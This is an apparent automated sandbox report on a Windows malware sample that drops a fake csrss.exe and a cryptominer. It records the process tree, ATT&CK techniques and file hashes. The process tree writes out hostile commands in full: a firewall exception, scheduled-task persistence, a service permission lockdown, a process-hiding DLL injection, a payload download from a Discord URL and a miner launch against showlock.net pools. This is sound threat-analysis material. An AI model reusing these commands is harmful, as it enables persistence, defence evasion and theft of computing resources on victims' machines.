description	pid	Process	procid_target
PID 4952 wrote to memory of 1048	4952	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	75
PID 4952 wrote to memory of 1048	4952	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	75
PID 4952 wrote to memory of 1048	4952	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	75
PID 796 wrote to memory of 3552	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	80
PID 796 wrote to memory of 3552	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	80
PID 796 wrote to memory of 3552	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	80
PID 796 wrote to memory of 4280	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	82
PID 796 wrote to memory of 4280	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	82
PID 4280 wrote to memory of 1004	4280	cmd.exe	84
PID 4280 wrote to memory of 1004	4280	cmd.exe	84
PID 796 wrote to memory of 4132	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	85
PID 796 wrote to memory of 4132	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	85
PID 796 wrote to memory of 4132	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	85
PID 796 wrote to memory of 4724	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	87
PID 796 wrote to memory of 4724	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	87
PID 796 wrote to memory of 4724	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	87
PID 796 wrote to memory of 3484	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	89
PID 796 wrote to memory of 3484	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	89
PID 796 wrote to memory of 3484	796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe	89
PID 3484 wrote to memory of 1296	3484	csrss.exe	90
PID 3484 wrote to memory of 1296	3484	csrss.exe	90
PID 3484 wrote to memory of 1296	3484	csrss.exe	90
PID 3484 wrote to memory of 3972	3484	csrss.exe	97
PID 3484 wrote to memory of 3972	3484	csrss.exe	97
PID 3484 wrote to memory of 3972	3484	csrss.exe	97
PID 3484 wrote to memory of 1872	3484	csrss.exe	99
PID 3484 wrote to memory of 1872	3484	csrss.exe	99
PID 3484 wrote to memory of 1872	3484	csrss.exe	99
PID 3484 wrote to memory of 3684	3484	csrss.exe	101
PID 3484 wrote to memory of 3684	3484	csrss.exe	101
PID 1788 wrote to memory of 2556	1788	windefender.exe	109
PID 1788 wrote to memory of 2556	1788	windefender.exe	109
PID 1788 wrote to memory of 2556	1788	windefender.exe	109
PID 2556 wrote to memory of 4636	2556	cmd.exe	110
PID 2556 wrote to memory of 4636	2556	cmd.exe	110
PID 2556 wrote to memory of 4636	2556	cmd.exe	110
PID 3484 wrote to memory of 216	3484	csrss.exe	112
PID 3484 wrote to memory of 216	3484	csrss.exe	112
PID 3484 wrote to memory of 216	3484	csrss.exe	112
PID 3484 wrote to memory of 2060	3484	csrss.exe	114
PID 3484 wrote to memory of 2060	3484	csrss.exe	114
PID 3484 wrote to memory of 2060	3484	csrss.exe	114
PID 2060 wrote to memory of 3968	2060	dcb505dc2b9d8aac05f4ca0727f5eadb.exe	116
PID 2060 wrote to memory of 3968	2060	dcb505dc2b9d8aac05f4ca0727f5eadb.exe	116
PID 2060 wrote to memory of 4964	2060	dcb505dc2b9d8aac05f4ca0727f5eadb.exe	117
PID 2060 wrote to memory of 4964	2060	dcb505dc2b9d8aac05f4ca0727f5eadb.exe	117
PID 2060 wrote to memory of 4964	2060	dcb505dc2b9d8aac05f4ca0727f5eadb.exe	117
PID 4964 wrote to memory of 1484	4964	csrss.exe	118
PID 4964 wrote to memory of 1484	4964	csrss.exe	118
PID 4964 wrote to memory of 1484	4964	csrss.exe	118
PID 3484 wrote to memory of 2200	3484	csrss.exe	120
PID 3484 wrote to memory of 2200	3484	csrss.exe	120
PID 3484 wrote to memory of 2200	3484	csrss.exe	120
PID 3484 wrote to memory of 4108	3484	csrss.exe	122
PID 3484 wrote to memory of 4108	3484	csrss.exe	122
PID 3484 wrote to memory of 4108	3484	csrss.exe	122
PID 3484 wrote to memory of 1480	3484	csrss.exe	124
PID 3484 wrote to memory of 1480	3484	csrss.exe	124
PID 3484 wrote to memory of 1480	3484	csrss.exe	124
PID 3484 wrote to memory of 4216	3484	csrss.exe	126
PID 3484 wrote to memory of 4216	3484	csrss.exe	126
PID 3484 wrote to memory of 4216	3484	csrss.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
"C:\Users\Admin\AppData\Local\Temp\f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nologo -noprofile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Users\Admin\AppData\Local\Temp\f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
  "C:\Users\Admin\AppData\Local\Temp\f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe"
  2⤵
  - Windows security bypass
  - Windows security modification
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- - C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1004
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4132
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4724
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Manipulates WinMonFS driver.
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1296
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:2940
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /delete /tn ScheduledUpdate /f
      4⤵
      PID:3032
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3972
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1872
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3684
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:4756
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1788
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2556
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:4636
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:216
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2060
    - - C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 8a891982-5a6e-455e-8ff1-b6b284b86f4a --tls --nicehash -o showlock.net:443 --rig-id 8a891982-5a6e-455e-8ff1-b6b284b86f4a --tls --nicehash -o showlock.net:80 --rig-id 8a891982-5a6e-455e-8ff1-b6b284b86f4a --nicehash --http-port 3433 --http-access-token 8a891982-5a6e-455e-8ff1-b6b284b86f4a --randomx-wrmsr=-1
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3968
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe -hide 3968
        5⤵
        Executes dropped EXE
        Manipulates WinMon driver.
        Suspicious use of WriteProcessMemory
        
        PID:4964
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:2200
  - - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      4⤵
      Executes dropped EXE
      PID:4108
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      4⤵
      Executes dropped EXE
      PID:4216

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3veftgab.awp.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
2.0MB

MD5
1bf850b4d9587c1017a75a47680584c4

SHA1
75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

SHA256
ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

SHA512
ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
2.8MB

MD5
713674d5e968cbe2102394be0b2bae6f

SHA1
90ac9bd8e61b2815feb3599494883526665cb81e

SHA256
f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

SHA512
e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
2.0MB

MD5
dcb505dc2b9d8aac05f4ca0727f5eadb

SHA1
4f633edb62de05f3d7c241c8bc19c1e0be7ced75

SHA256
61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

SHA512
31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

Filesize
1.5MB

MD5
4928756f917def61af1cadbd4315855d

SHA1
64d8b0155e41f3eb74c9ab1354a053187332ae18

SHA256
b0a8c9016eee8cf2501fbd9c47e9d7643d101e13b02f8449eade318e75e0e900

SHA512
13b409f2f2dfcc3ac1aaba72acd10422317ee1095d358c9320f44abb94d2c64281f86ebedabb2b6fa4d9d797f0b84320ebbba9b8978d5fd41778847d043d8291

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

Filesize
1.3MB

MD5
6652d0c45c17e2c27582565ed1e875b5

SHA1
a746c93d7e96a304d465ae11e1b2c3d45f089288

SHA256
e601a9c46041352021b33cdf7fcf6ed2e4ef49c1010ec67847dea59350681e98

SHA512
c54a2c2997b753140343b3a95dfbf3c057efee104de7fea203bfee667e190e7204ff951b27f78fff57a6cf360ec35e3ecddfb82f1d8012cbc5eeaf84ea568c81

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
33KB

MD5
7aac7c53b58a8b0a0b23552816658244

SHA1
296b3e96334a230b623c91284b3efb223fca218e

SHA256
d9619d2067c02e6cdbe31e2971cd22d05e4f4051ad4257f1011030c656188bc2

SHA512
4230577e5cd538dd5c333de1f0cb2c6086c0fbe100c1bbd8bf6a8e6700acef62487e9ecd97f9e7a6da7a9f95c9bffdc023aa68daa062df275cc9909208c85045

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
ba2a09180e52d21a23fceef382977b44

SHA1
7191c75314edeace69aef57f73a3f5d2192f5370

SHA256
8751f8c2aa85777423e7ed617a93eb60832b69e9acf24a90656049da358a24c6

SHA512
1b621fe9e98036ff7b81de3b44cdc0ed8c694b433e76397a12e0db4b5c92ece0b994da78a405e46da0e72d0b0666ac5bbedb48859690b8e8cecc4c1d9f754905

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
da931e890beaf0220ea74378153d4674

SHA1
07c0519705773b5ad7a081a8838e92d014bd8a4c

SHA256
f24646fa6f26af159932a8214d06f82b73a61edfd579e7cf59ca744c0fc923e8

SHA512
810f436a38369c427e5ebc6b0ac63e29f0b5d0a9cd0d38fc2bf81ebe870a00d599a6e2729d7b11079c7ca4e6bb1eec835838df6af49fbec0cf2369dcbbfa25b0

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
59a70ea2d03d402f3d468c0cccdde71c

SHA1
27f4faae6dd4058d0e1e388126dd07b14f831b2b

SHA256
40463002ee15d50e40b159de319472109ec7822c867cbe0c56c47c8670c0cae9

SHA512
f7bd77da94c1abceb37d9e02733a4f5c9e598017ac76993177289fc2863f6792207d01f40f1b0a0e0c4f8f4eaa9c71791461d95be336e1efaad7a48379569ca9

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
06a34f86617cd4d4f369117c354e6505

SHA1
522e2afefa427ddb61bf28a876964fe74f0a5dae

SHA256
5f8420ece10f21c07500652306a5a4170efddac7fb9f7dcc83184720ced54c35

SHA512
58375ffdc91b127649001f55d633528a463658537648003ac550af29b7080ce99d1c54b8ba5525c31a446d1216a98be660d1022e0c4ae3803441dadf4595a35a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
ff8e77e888dfd2608b10c2758b8a47ab

SHA1
cb40639840b56d4d3eef4518ce3b21322ac664c0

SHA256
70164d9fa2b94e89a4ba0ac2bc31827ce61b130e3a8990ec45dcce5424aa6ae5

SHA512
ddc0870f3eca5f40fbe1be0f39274cd748891dac1b6ada4ce7e2a47f2676340531310df86ef7baadb1eb546ecf3d2e3e4d3e362b82850b40e21cbea3f1816978

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
78f065bc234770f9bdd2435e2add77fe

SHA1
b9fa7c8f018c22a4059f402e413876b44525a79b

SHA256
19e9e7b3cde71ca91bbe65fbaf932df1a5e09ff411aa0b3210e7c4bcd74896c8

SHA512
76ef7c8515060a16f9724ff10104938220dd4aea09d893ab94c94cbed54f6a318623df487563e31d873a02eccbfae7660cf85f72b31d6768a1e2c4a3a6059fd3

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
a31b32d0191974dd741b554104a90bd9

SHA1
db3ad5cfe2898427b822723eb36c7a5341ca2805

SHA256
ed68965054240fa407bd0b293af254e2cfeb43dcb54d7260e85e459a8e76b28d

SHA512
5757e26f3bb57f3324fd132885edf05afa80fd692bba949bee1e5f2ea234228a3aabf9aff37a47cc83835ca84b6ebb3abef3099e766cc6748c4b16fa87847fb1

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
3e20ea25b0966cbb07c7886584e5922a

SHA1
c549449da86b08ef884c1c2acb715812d6149907

SHA256
d63d413b0c83701ea86068633bb71e08469efe959655fdf4b040681c2f0c83f4

SHA512
5d5741a383572c78cd02b4e2109501a3f670d6dcddecd915b5a57e8076975404f3d1a61466a68bc5becdde546194e770745d9f3ce74d6070b252c7916f71ec40

Download Submit
C:\Windows\rss\csrss.exe

Filesize
1.4MB

MD5
0ae2c0d5e66b95bbc908ad100ef107d9

SHA1
5e35996dd6ebe3770ae986ecd28e3e83ad85e0e9

SHA256
5d25c2cf9073e8419f8f8b57cf27233cc646618011ec57496054b6a4c6b67e1d

SHA512
21ff029337e84d46d32ddb4806cb32ac8f2f8e873f5d22869cde4a6d0a3fe5f67c08abdc30206340844edf6f8a0d830322034976f46d9d506e083af479231d0e

Download Submit
C:\Windows\rss\csrss.exe

Filesize
1.3MB

MD5
db763678d321ab5ee79096108bebaf11

SHA1
5380d001baa05846ce036c81b4fc10ee76bf34c3

SHA256
4f09cf16f1dc195a12c3256e07f4fd400a11fe75497406770817ef6fb8471599

SHA512
aa221063593ecb0b4d8ab9b5bc3f436253d8b856dc46d23860b168e0597319df1c836b6344422630b78b41cb4b8869024279ccadd9df67334ad37456cd2cde91

Download Submit
C:\Windows\rss\csrss.exe

Filesize
1.1MB

MD5
2757d891ab29014a25a4031b8ec07fbb

SHA1
861f2349689d5532cda83a01a223fe10e8c41b50

SHA256
df3aa7215bed01e7481d67ddd8149837c3ae66001c241ed116361affe1417554

SHA512
d6a635d06fb1448c12f69c3f82eddac1d1f2822675c302d1e0c1b597243868c3b25b1714648360c6eef3c2720eb69b10217e8d833bb17624632f2a51ad54c872

Download Submit
C:\Windows\windefender.exe

Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
memory/392-1798-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/392-1802-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/796-306-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
memory/796-305-0x0000000003F20000-0x0000000004327000-memory.dmp

Filesize
4.0MB

Download
memory/796-1043-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
memory/796-801-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
memory/796-579-0x0000000003F20000-0x0000000004327000-memory.dmp

Filesize
4.0MB

Download
memory/1048-12-0x0000000007BC0000-0x0000000007C26000-memory.dmp

Filesize
408KB

Download
memory/1048-35-0x0000000008520000-0x000000000855C000-memory.dmp

Filesize
240KB

Download
memory/1048-8-0x0000000004C10000-0x0000000004C20000-memory.dmp

Filesize
64KB

Download
memory/1048-301-0x0000000073470000-0x0000000073B5E000-memory.dmp

Filesize
6.9MB

Download
memory/1048-75-0x0000000070180000-0x00000000701CB000-memory.dmp

Filesize
300KB

Download
memory/1048-9-0x0000000004C10000-0x0000000004C20000-memory.dmp

Filesize
64KB

Download
memory/1048-10-0x00000000072E0000-0x0000000007908000-memory.dmp

Filesize
6.2MB

Download
memory/1048-11-0x0000000007940000-0x0000000007962000-memory.dmp

Filesize
136KB

Download
memory/1048-84-0x000000000A260000-0x000000000A2F4000-memory.dmp

Filesize
592KB

Download
memory/1048-13-0x0000000007CA0000-0x0000000007D06000-memory.dmp

Filesize
408KB

Download
memory/1048-14-0x0000000007D10000-0x0000000008060000-memory.dmp

Filesize
3.3MB

Download
memory/1048-15-0x0000000008080000-0x000000000809C000-memory.dmp

Filesize
112KB

Download
memory/1048-277-0x000000000A1E0000-0x000000000A1FA000-memory.dmp

Filesize
104KB

Download
memory/1048-7-0x0000000073470000-0x0000000073B5E000-memory.dmp

Filesize
6.9MB

Download
memory/1048-6-0x0000000004BC0000-0x0000000004BF6000-memory.dmp

Filesize
216KB

Download
memory/1048-76-0x00000000701D0000-0x0000000070520000-memory.dmp

Filesize
3.3MB

Download
memory/1048-83-0x0000000004C10000-0x0000000004C20000-memory.dmp

Filesize
64KB

Download
memory/1048-66-0x00000000091D0000-0x0000000009246000-memory.dmp

Filesize
472KB

Download
memory/1048-73-0x000000007ECA0000-0x000000007ECB0000-memory.dmp

Filesize
64KB

Download
memory/1048-82-0x000000000A060000-0x000000000A105000-memory.dmp

Filesize
660KB

Download
memory/1048-282-0x000000000A1D0000-0x000000000A1D8000-memory.dmp

Filesize
32KB

Download
memory/1048-77-0x000000000A000000-0x000000000A01E000-memory.dmp

Filesize
120KB

Download
memory/1048-74-0x000000000A020000-0x000000000A053000-memory.dmp

Filesize
204KB

Download
memory/1048-16-0x00000000080C0000-0x000000000810B000-memory.dmp

Filesize
300KB

Download
memory/1296-1051-0x0000000004A20000-0x0000000004A30000-memory.dmp

Filesize
64KB

Download
memory/1296-1053-0x00000000078C0000-0x0000000007C10000-memory.dmp

Filesize
3.3MB

Download
memory/1296-1052-0x0000000004A20000-0x0000000004A30000-memory.dmp

Filesize
64KB

Download
memory/1296-1055-0x0000000008200000-0x000000000824B000-memory.dmp

Filesize
300KB

Download
memory/1296-1074-0x000000007FA20000-0x000000007FA30000-memory.dmp

Filesize
64KB

Download
memory/1296-1050-0x00000000734D0000-0x0000000073BBE000-memory.dmp

Filesize
6.9MB

Download
memory/1788-1796-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2060-2084-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/3484-1811-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
memory/3484-1827-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
memory/3484-2607-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
memory/3484-1788-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
memory/3484-1046-0x0000000004300000-0x00000000046F9000-memory.dmp

Filesize
4.0MB

Download
memory/3484-1047-0x0000000000400000-0x00000000022EC000-memory.dmp

Filesize
30.9MB

Download
